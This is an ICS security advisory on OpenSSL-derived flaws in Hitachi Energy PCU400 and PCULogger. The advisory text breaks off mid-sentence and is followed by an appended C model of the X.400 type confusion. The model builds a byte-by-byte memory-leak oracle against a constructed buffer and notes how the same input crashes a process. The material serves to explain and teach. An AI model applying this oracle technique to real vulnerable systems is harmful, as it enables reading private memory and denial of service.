1. EXECUTIVE SUMMARY
- CVSS v3 7.5
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Hitachi Energy
- Equipment: PCU400, PCULogger
- Vulnerabilities: Access of Resource Using Incompatible Type (‘Type Confusion’), NULL Pointer Dereference, Use After Free, Double Free, Observable Discrepancy, Out-of-bounds Read
2. RISK EVALUATION
Exploitation of these vulnerabilities could allow an attacker to access or decrypt sensitive data, crash the device application, or cause a denial-of-service condition.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
Hitachi Energy reports that the following products are affected:
- PCU400: Version 6.5 K and prior
- PCU400: Version 9.4.1 and prior
- PCULogger: Version 1.1.0 and prior
3.2 VULNERABILITY OVERVIEW
3.2.1 ACCESS OF RESOURCE USING INCOMPATIBLE TYPE (‘TYPE CONFUSION’) CWE-843
There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial-of-service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which hav
[…]
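Worked model of the type confusion described in 3.2.1. This is an added example, not code from Hitachi Energy or from OpenSSL: the struct layouts of ASN1_STRING and ASN1_TYPE mirror OpenSSL's public headers and the names GENERAL_NAME_cmp, ASN1_TYPE_cmp and ASN1_STRING_cmp refer to the OpenSSL functions named above, but the comparison routines here are reduced models, and make_x400, leak_oracle, leak_bytes and fixed_cmp_does_not_follow_pointer are hypothetical helpers constructed for this illustration. It assumes an LP64 layout (checked with a static assertion), under which the ASN1_TYPE value union lands on ASN1_STRING.data, so the content bytes of the X.400 address are themselves read as an ASN1_STRING and the pointer embedded in them reaches memcmp. The "secret" buffer is a constructed stand-in for process memory that an attacker controlling both the certificate chain and the CRL wants to read.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Layouts mirror OpenSSL's public ASN1_STRING and ASN1_TYPE. */
typedef struct {
    int length;
    int type;
    unsigned char *data;
    long flags;
} ASN1_STRING;

typedef struct {
    int type;
    union {
        char *ptr;
        ASN1_STRING *asn1_string;
    } value;
} ASN1_TYPE;

/* Assumption of this model: LP64, where the ASN1_TYPE value union sits exactly
 * where ASN1_STRING.data sits. That overlap is what turns the mistyped field
 * into a pointer the attacker controls. */
_Static_assert(offsetof(ASN1_TYPE, value) == offsetof(ASN1_STRING, data),
               "model assumes an LP64 layout");

#define V_ASN1_OCTET_STRING 4

/* Reduced ASN1_STRING_cmp: equal length, then memcmp of the payloads. */
static int asn1_string_cmp(const ASN1_STRING *a, const ASN1_STRING *b)
{
    if (a->length != b->length)
        return a->length - b->length;
    return memcmp(a->data, b->data, (size_t)a->length);
}

/* Reduced ASN1_TYPE_cmp for string-valued tags. */
static int asn1_type_cmp(const ASN1_TYPE *a, const ASN1_TYPE *b)
{
    if (a->type != b->type)
        return a->type - b->type;
    return asn1_string_cmp(a->value.asn1_string, b->value.asn1_string);
}

/* Before the fix: x400Address was declared ASN1_TYPE *, so the parsed
 * ASN1_STRING was handed to ASN1_TYPE_cmp. The same bytes are viewed as an
 * ASN1_TYPE (memcpy keeps this model free of aliasing UB; the real code just
 * dereferenced the mistyped pointer): the string's length becomes the tag and
 * its data pointer becomes the ASN1_STRING * that gets compared. */
static int general_name_cmp_vulnerable(const ASN1_STRING *x400_a,
                                       const ASN1_STRING *x400_b)
{
    ASN1_TYPE va, vb;
    memcpy(&va, x400_a, sizeof va);
    memcpy(&vb, x400_b, sizeof vb);
    return asn1_type_cmp(&va, &vb);
}

/* After the fix: the field is an ASN1_STRING * and is compared as one. */
static int general_name_cmp_fixed(const ASN1_STRING *x400_a,
                                  const ASN1_STRING *x400_b)
{
    return asn1_string_cmp(x400_a, x400_b);
}

/* Constructed attacker input: the address content is a fake ASN1_STRING header
 * whose data pointer is the address to read. Returns what the parser would
 * produce for that X.400 address. Both sides use the same outer length, so
 * the tag check in ASN1_TYPE_cmp (which reads that length as the tag) passes. */
static ASN1_STRING make_x400(ASN1_STRING *payload, const void *ptr, int len)
{
    ASN1_STRING addr;
    payload->length = len;
    payload->type = V_ASN1_OCTET_STRING;
    payload->data = (unsigned char *)ptr;
    payload->flags = 0;
    addr.length = (int)sizeof *payload;
    addr.type = V_ASN1_OCTET_STRING;
    addr.data = (unsigned char *)payload;
    addr.flags = 0;
    return addr;
}

/* One oracle query: do `len` bytes at `target` equal `guess`? The certificate
 * side carries the target pointer, the CRL side carries the guess. */
int leak_oracle(const void *target, const void *guess, int len)
{
    ASN1_STRING pa, pb;
    ASN1_STRING cert_x400 = make_x400(&pa, target, len);
    ASN1_STRING crl_x400 = make_x400(&pb, guess, len);
    return general_name_cmp_vulnerable(&cert_x400, &crl_x400) == 0;
}

/* Recover `n` bytes at `target`, at most 256 queries per byte. */
int leak_bytes(const void *target, unsigned char *out, int n)
{
    for (int i = 0; i < n; i++) {
        int found = 0;
        for (int g = 0; g < 256 && !found; g++) {
            unsigned char guess = (unsigned char)g;
            if (leak_oracle((const unsigned char *)target + i, &guess, 1)) {
                out[i] = guess;
                found = 1;
            }
        }
        if (!found)
            return 0;
    }
    return 1;
}

/* Control: the fixed comparison looks only at the address bytes and never
 * follows the embedded pointer, so two payloads that differ only in that
 * pointer compare unequal and nothing about *target is revealed. */
int fixed_cmp_does_not_follow_pointer(const void *target, const void *guess)
{
    ASN1_STRING pa, pb;
    ASN1_STRING a = make_x400(&pa, target, 1);
    ASN1_STRING b = make_x400(&pb, guess, 1);
    return general_name_cmp_fixed(&a, &b) != 0;
}

int main(void)
{
    static const char secret[] = "constructed secret"; /* stands in for process memory */
    unsigned char out[sizeof secret];
    if (leak_bytes(secret, out, (int)sizeof secret))
        printf("leaked via confused compare: %s\n", (const char *)out);
    return 0;
}
```

Build with a C11 compiler (cc -std=c11 -o x400 x400.c). Pointing the embedded data pointer at an unmapped address instead of readable memory gives the denial-of-service outcome the advisory mentions; the fixed comparison never dereferences the address content, so the same input is just two byte strings that differ.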